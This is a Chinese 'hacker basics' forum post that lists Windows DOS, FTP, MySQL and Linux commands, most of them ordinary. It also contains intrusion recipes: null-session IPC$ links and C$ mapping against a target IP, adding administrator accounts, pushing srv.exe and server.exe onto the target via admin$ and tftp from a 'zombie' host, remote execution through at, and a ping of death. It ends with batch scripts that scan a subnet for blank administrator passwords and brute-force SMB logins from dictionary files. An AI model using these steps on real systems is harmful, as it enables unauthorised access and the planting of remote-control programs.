黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 & J+ z; u. s- U. Z# ^( p
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 , p2 h, M  ]1 E! h0 v/ t
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
% O- |1 d* P) }net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: ' C/ Y. }( _. O8 ?: p# {  P$ E
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
4 h: ?" M3 ~& S0 hnet use h: /del 删除映射对方到本地的为H:的映射 - |0 T  F7 c0 P. D, L# G) X% H$ i
net user 用户名　密码　/add 建立用户 ( X8 J! c3 u+ @2 ?
net user guest /active:yes 激活guest用户
6 ~# f/ O' c& [2 [% y2 m  Y8 s, `net user 查看有哪些用户
+ i; @( Q) o" h! Dnet user 帐户名 查看帐户的属性 2 e1 `1 [, x& _: G- P
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 / ^' Z2 u# @/ m' ^* {! X
net start 查看开启了哪些服务
! K1 z$ I, J! N! M9 T, }net start 服务名　 开启服务；(如:net start telnet， net start schedule) 9 z: Y- {- t7 m7 m: J3 ^2 D
net stop 服务名 停止某服务 0 ]  x) b: Q; }5 ~( K8 V
net time \\目标ip 查看对方时间 * f; o+ i: Y& ?* z3 d
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 . b# m+ {1 a0 o! E9 |+ n. h) y, }
net view 查看本地局域网内开启了哪些共享 / w7 k6 h3 _" N) r, h, J9 S
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 8 M! b7 N2 {" V$ h6 ?- L) R
net config 显示系统网络设置 5 n$ {" J3 `2 r2 L' m& o2 m
net logoff 断开连接的共享
" G: [% C5 K$ {& L7 a1 k$ Knet pause 服务名 暂停某服务
4 c: V! }- ~$ }; a3 @) Snet send ip "文本信息" 向对方发信息 " W! M6 E! Y) y" w; {7 Z7 h! l; @
net ver 局域网内正在使用的网络连接类型和信息 . L5 [' M3 K0 e+ B5 [
net share 查看本地开启的共享
* h" P% H0 E3 d0 Knet share ipc$ 开启ipc$共享
6 G5 b2 H, S% K$ [8 ^+ jnet share ipc$ /del 删除ipc$共享 5 Y, j6 t" L8 Z" z, A/ l( {2 x1 A
net share c$ /del 删除C：共享
) K' x  Y- ^8 d5 xnet user guest 12345 用guest用户登陆后用将密码改为12345 2 G1 U- s0 V# S( }: g
net password 密码 更改系统登陆密码 ! B6 _& f5 F  j4 x2 v! u
netstat -a 查看开启了哪些端口,常用netstat -an $ ], C# T1 y, T: U+ a6 j- V$ x
netstat -n 查看端口的网络连接情况，常用netstat -an
4 o9 v/ x4 ]$ l" s2 Inetstat -v 查看正在进行的工作
. H5 G6 _0 z3 U6 Y) ~netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） * p5 K; u( V" }* ?
netstat -s 查看正在使用的所有协议使用情况
$ ]! V8 U  I, @' X* m3 Tnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 / _# v: h, b$ M3 y: k
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
, A! O( c+ e9 Y2 b, o7 ^+ {ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 6 D9 d' z, C. x; c$ Q3 u
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
6 M* F3 M9 _7 Aipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 ' {$ F0 d/ S0 [# R/ {
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
$ C9 O3 N/ {4 q# F& R8 akill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
1 }! @8 L9 d1 _# F& c* ?8 W, }6 @4 Mdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 " |; [$ H3 \! k+ d) ]9 J' Z7 Y
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
1 ~* Q3 I  k5 _move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 1 z% z% T& C' U( D/ S/ D
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
5 R8 G- L$ L8 k" B  `) t4 T) Iat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
7 ]) G& G8 }, V: ]' g' dat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 6 {1 p: A3 a6 E9 {/ \
at id号 /delete 停止某个已注册的计划任务   b  T' j  ~) x9 M
at 查看所有的计划任务 9 r/ J! l0 i( ]2 Y/ p% r
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 0 ?' [% U% d/ m+ e; r
finger username @host 查看最近有哪些用户登陆 / J+ l# \" y6 s7 U7 V! M8 s
telnet ip 端口 远和登陆服务器,默认端口为23 5 {6 g4 j* d% T5 v; m( l0 _
open ip 连接到IP（属telnet登陆后的命令）
  k" {1 C; g  z* t) j2 x6 R  J( ytelnet 在本机上直接键入telnet 将进入本机的telnet 3 q0 l/ Z& m8 c2 T; {6 u* }  D. S
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
4 |' a# T, J& v4 `% Xcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
: @% E' L7 L& G+ P* x$ X& kcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
( M! O5 ?$ H6 H! j2 bcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： ' A$ @, `/ B9 z
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 1 V1 _6 ~- y$ k( @0 ?5 ?
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 ( L* g5 p2 C7 D$ Q' {) @/ i2 u
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 ! `1 \' l; @" Z; \' l
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
- \* a: Z. y5 L' _route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface 9 a0 |2 F( p# R1 e
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 1 }# v; @, X: k1 ?6 l
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 $ s, y, {3 }* j% f+ a
mem 查看cpu使用情况 - g4 p" m& ?; A, c% e, N
attrib 文件名(目录名) 查看某文件（目录）的属性
2 v8 j* P- U: fattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
; c2 a3 ^: `7 ~dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
; o: Q7 `! V6 Q7 _' {" T' ddate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
5 m' g+ D* [7 z4 j% a& yset 指定环境变量名称=要指派给变量的字符 设置环境变量
9 e% n* a* k3 n1 y% b) nset 显示当前所有的环境变量 6 o: L+ e/ k8 T! L0 M* n
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
: `) j! L) p- r2 ?+ `) @pause 暂停批处理程序，并显示出：请按任意键继续....
+ |* q& D/ o% C( i+ X1 K2 qif 在批处理程序中执行条件处理（更多说明见if命令及变量） 8 g2 g2 `  C9 t1 h) u
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
$ w9 H$ Q+ x/ W: [  ccall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） & [  X% ~7 N& [3 G* C+ U0 N
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
  F. a  n1 G" d) e+ |9 R9 a9 W( ?/ ^- }echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 2 {5 m  @) S" o3 F" d1 M
echo 信息 在屏幕上显示出信息 , R$ K0 h- Y% l. U3 x
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 # }2 x* V$ O3 u' I
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
1 w7 n2 ?) l. Q3 j: \( N( `7 ~find 文件名 查找某文件
, J+ d. _, u7 q. V7 wtitle 标题名字 更改CMD窗口标题名字
0 c1 J$ ~7 a1 ^7 c5 Q5 vcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
9 x' G& ~# a' u8 j$ _1 Fprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
0 s2 Z3 e& p6 X6 Yprint 文件名 打印文本文件
' l2 p5 }$ J+ ^7 }; t6 p9 Z$ mver 在DOS窗口下显示版本信息
' ^# y, X! d2 }0 lwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
+ g- [4 _: U$ S) F" e3 |5 {format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
4 \+ v; u: }7 Y9 K, i) {$ Smd　目录名 创建目录 - k6 i! K& P: g$ _; Y0 K
replace 源文件　要替换文件的目录 替换文件
' E* c! `( [9 Cren 原文件名　新文件名 重命名文件名 ' L8 Y7 Q& ~- o4 s
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
1 b' I! @+ E- ~6 h, O! g6 H# g% jtype 文件名 显示文本文件的内容 ( E. Y7 f% G/ }' Q" N( U
more 文件名 逐屏显示输出文件 : y% e- P5 T/ p0 u
doskey 要锁定的命令＝字符1 R8 p- N- T3 k( \
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
9 r. @" [2 C* dtaskmgr 调出任务管理器
% G7 H, y# _5 l. E  ^chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 + A' z- ^: Q/ x5 S) p. v
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
  }0 v* V/ d5 k4 Iexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe ; t/ f( D" b  ^* y0 B0 s
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
8 G' y0 ]% B* E' y- [cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ( B2 u* m) ?8 m* u; M
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； ' N. p4 ^( A5 v
regedit /e 注册表文件名 导出注册表 : f+ V( v0 ~% `, z
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 4 G  S" w: w8 i3 [4 f
cacls 文件名 查看文件的访问用户权限列表 . c7 {  ~  `3 ^6 ^
REM 文本内容 在批处理文件中添加注解
8 g! A5 Z5 O9 F4 O) f2 n! znetsh 查看或更改本地网络配置情况
$ m( T+ C) b( J  E7 LIIS服务命令：
# x( ]! ^( J/ ~8 `) t/ wiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
5 K& N4 e7 e7 Y3 w9 E: ~7 S( {iisreset /start或stop 启动（停止）所有Internet服务 . S" T6 h: v% A- m$ [) G. @& S
iisreset /restart 停止然后重新启动所有Internet服务
3 f" c( A3 p& }1 Y# e6 i4 Niisreset /status 显示所有Internet服务状态 . `/ O7 U- `4 Z0 H1 h+ y5 f
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 9 a( S$ P, l  O+ @
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
  u% ?7 |" U; \, J& o/ qiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 7 i0 e/ j% I0 c+ I" {, t5 r
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
3 P$ a( G. ]' N, d! z: eFTP 命令： (后面有详细说明内容)
: G; K5 c6 E+ ]* g8 c  rftp的命令行格式为:
- S2 N" D" \; C5 N' C+ q' e$ Nftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
  c1 ?  O% Z9 V1 [1 t－d 使用调试方式。 - X3 @& t- B8 P5 Y
－n 限制ftp的自动登录,即不使用.netrc文件。
$ G3 z2 Y$ B+ P. _* k, |5 k－g 取消全局文件名。 6 k7 }' h' x9 m# _/ W5 H' B$ {
help [命令] 或 ？[命令] 查看命令说明 / e( o+ f3 |. a# y5 h0 U/ }- h/ |* J
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. $ p8 E9 w2 q' w0 }9 v
pwd 列出当前远端主机目录
) r/ c0 L4 S8 q0 P) \put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 + W& W5 u2 S7 ?
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 % s1 x6 j2 i* N5 g" p
mget [remote-files] 从远端主机接收一批文件至本地主机 8 w+ X+ B" }) g2 r
mput local-files 将本地主机中一批文件传送至远端主机 . e) o& [, z9 p) g( z  D
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 ; `$ O$ W: N9 o" L' \
ascii 设定以ASCII方式传送文件(缺省值)
# C1 A# @  ?& j$ _bin 或 image 设定以二进制方式传送文件 / j1 S7 d  V& g
bell 每完成一次文件传送,报警提示 6 [- Y/ S0 y# O  ~6 c
cdup 返回上一级目录
/ ], Y& D3 I) sclose 中断与远程服务器的ftp会话(与open对应)
6 d6 k0 s: Y+ b( j5 A( Zopen host[port] 建立指定ftp服务器连接,可指定连接端口
; s' n+ D( T9 U% \  Rdelete 删除远端主机中的文件
8 O1 I' O. h$ E6 G9 M- d" d, F( qmdelete [remote-files] 删除一批文件
* T2 v  d! s/ Fmkdir directory-name 在远端主机中建立目录
. m# C4 u3 ^. n2 p# J# m& u8 q* W5 ?rename [from] [to] 改变远端主机中的文件名 * U5 z* C6 R- j" L2 L, n# j
rmdir directory-name 删除远端主机中的目录
8 o2 `# B+ }2 Y# v* s2 nstatus 显示当前FTP的状态
/ e) }, E: _- d0 P* T$ dsystem 显示远端主机系统类型
5 h. L# w& x  V& r4 `user user-name [password] [account] 重新以别的用户名登录远端主机 * b, {- o/ W& s) I5 a
open host [port] 重新建立一个新的连接
  M) y% v" g: Q( Jprompt 交互提示模式 8 w4 [  R/ h. W8 {+ @
macdef 定义宏命令
; u/ ]% ~' I9 i- W  z6 }% slcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
$ ^$ ]; H8 Y! k  Bchmod 改变远端主机的文件权限 7 v& z' X" D) h. v7 H& O
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 ( K  Q6 [" h/ n  T
cd remote－dir 进入远程主机目录
# v! j5 p8 s9 g* g6 s$ |cdup 进入远程主机目录的父目录   G0 ~& F2 E$ R5 q- c' ]# A
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip : D2 D; Y+ m+ y+ S% M7 T6 P# `
MYSQL 命令： 0 n; \+ n  I! _6 m* z' B
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
# S6 R' L: p5 _: Z. g. h（例：mysql -h110.110.110.110 -Uroot -P123456 $ _8 I$ M1 l5 C# e2 V
注:u与root可以不用加空格，其它也一样）
2 B# C2 o2 K+ |' B' P  cexit 退出MYSQL
5 V" ~' i& N1 @mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
& ?7 b# _6 C9 rgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
3 c: n7 Q' _) i3 w$ F0 ]show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 5 K9 B- @4 s- x
use mysql；
4 E: a- s1 d  Q+ E5 m2 mshow tables; 显示库中的数据表
& ^+ E) a: n7 C, m5 ]6 R6 ~) Jdescribe 表名; 显示数据表的结构
; ~" f- L8 h& h8 pcreate database 库名; 建库 3 o/ j1 @- H; b
use 库名；
! b: l( `! z, a1 ncreate table 表名 (字段设定列表)； 建表
. O( L; J$ D( D0 G3 h. H0 ]drop database 库名; . e/ j& D& x% [  n2 h1 a  K
drop table 表名； 删库和删表
, N; X  W3 W% R8 |( Y6 r  T8 Pdelete from 表名; 将表中记录清空 $ P2 h+ k' ?# @
select * from 表名; 显示表中的记录
- h. I8 X- m5 O8 i* Q6 Tmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
* |9 C) o+ z0 ^' \8 L5 Xwin2003系统下新增命令（实用部份）： 8 f* y; i, R* W* e  }
shutdown /参数 关闭或重启本地或远程主机。5 U' F( _# |2 m6 R" K# K. {( o
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。! c( W# u+ B, |
例：shutdown /r /t 0 立即重启本地主机（无延时） 3 Q/ T2 _4 }' B) |# s6 f2 E% E, p
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。; T6 i: W9 W0 Y  Z* ?* B5 t* M
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 3 I  j; B. c# d7 E* z# q2 w) `
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
% ^& [# k% T3 r8 L2 C参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
" _( |0 [/ h! s( W) c5 O6 qLinux系统下基本命令： 要区分大小写9 @+ p, }9 H" J1 S
uname 显示版本信息（同win2K的 ver） 2 V) o- ?, S7 e' _2 w
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
: f0 ^+ F2 C( a8 V% Z7 cpwd 查询当前所在的目录位置 / _, f8 {  _! z$ Q) m) S) \  Q
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 ( Z- O- ^1 D' \" ]$ t/ n
cat 文件名 查看文件内容 & o$ S% l* t& v- P/ k
cat >abc.txt 往abc.txt文件中写上内容。
- ~% w. v! L8 t9 amore 文件名 以一页一页的方式显示一个文本文件。
7 g" |( K& M* ^5 A2 |cp 复制文件
+ {; X4 V6 P( Z. f: [+ zmv 移动文件
/ U( R! k- Y/ v3 Orm 文件名 删除文件，rm -a 目录名删除目录及子目录
6 {0 z$ X* E' F7 d+ x9 hmkdir 目录名 建立目录
9 P+ Q( s1 _0 y6 q( Frmdir 删除子目录，目录内没有文档。
( L" ?' Q6 O# |; Zchmod 设定档案或目录的存取权限
& }% k! d4 u& B8 s- ]grep 在档案中查找字符串 ( y2 H  ~0 K  O& N/ X0 y
diff 档案文件比较
& x9 E1 [  u# b  ?4 w9 X3 ^find 档案搜寻
, x! a% J1 P. ^( J% S% ydate 现在的日期、时间
! p0 `' H, J' S- S: jwho 查询目前和你使用同一台机器的人以及Login时间地点 * }" D1 `# n* P' {  l9 ^. }& c3 E
w 查询目前上机者的详细资料 " ~# k$ [9 W1 T* {, g
whoami 查看自己的帐号名称 ; {% }8 O  |( @; S
groups 查看某人的Group
: G+ K6 @8 {- G) Q0 s. J6 @$ ]passwd 更改密码 ' K3 P1 ^" b5 @/ k1 f
history 查看自己下过的命令
1 ?  u: e9 o# zps 显示进程状态
% Z+ n8 f* h6 ekill 停止某进程
4 m; N8 ?& o/ s! B% c0 y7 _" Cgcc 黑客通常用它来编译C语言写的文件 - w. u" S9 D: a5 M$ f* }
su 权限转换为指定使用者
+ P) S6 ~2 _* i0 }( Z) D; v6 gtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
* Y2 e" K4 U& K; `& v0 mftp ftp连接上某服务器（同win2K; _- `7 l/ S. l' K0 G
附：批处理命令与变量0 Z0 _' w  ?2 ?) x6 N
1：for命令及变量 基本格式：
; V  n& T' o8 G* lFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
) T8 q8 c! V! Y. o" c  {批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
7 u$ l  W8 G: I; O3 ~(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}/ E) _, |8 v) \- r- w0 T) D( s
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
* d* y5 L8 f4 ]' Acommand_parameters：为特定命令指定参数或命令行开关
  g, g0 ~$ h1 m/ f! B3 r3 V8 z& W7 QIN (set)：指在(set)中取值；DO command ：指执行command
8 F6 W* {4 g' R7 N6 [# [/ n3 Q参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
: u$ T% C% K" W% |6 R) r" X6 z  N用法举例： / ]2 A' Z% P& H
@echo off 7 h; E3 \+ [, E) ~# x
echo 用法格式：test.bat *.*.* > test.txt
+ s5 l5 ^; D; z! s4 D: ifor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
1 J% y3 I5 x! ^$ Q1 n4 ^9 X4 ~存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
1 H! n) H. [3 r! T/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
, m" T5 K* \  R) j1 P@echo off
" n, H4 \0 R3 H1 V, t0 Iecho 用法格式：ok.bat ip . m4 x7 {6 w' F
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
5 B! Z  a  G" s5 M% O存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。" }+ e8 N! |+ V4 d& L: n# l& V2 }
2：if命令及变量 基本格式：
- X0 z8 c& d( ^# J, S( EIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
/ H. C* [7 u4 U: C, B例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。6 @- m7 H  O+ Q2 g" c* p+ G
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 & u; c! \" W8 M) d
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
, D+ t3 H9 R7 a: G3 S' c4 k例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
( O$ Z4 h) l" h  w, j7 LIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
" `! r' L3 a# S  p. T8 J9 X% L& U例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 2 t6 t  j% f4 h' {1 n+ G$ C9 }
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”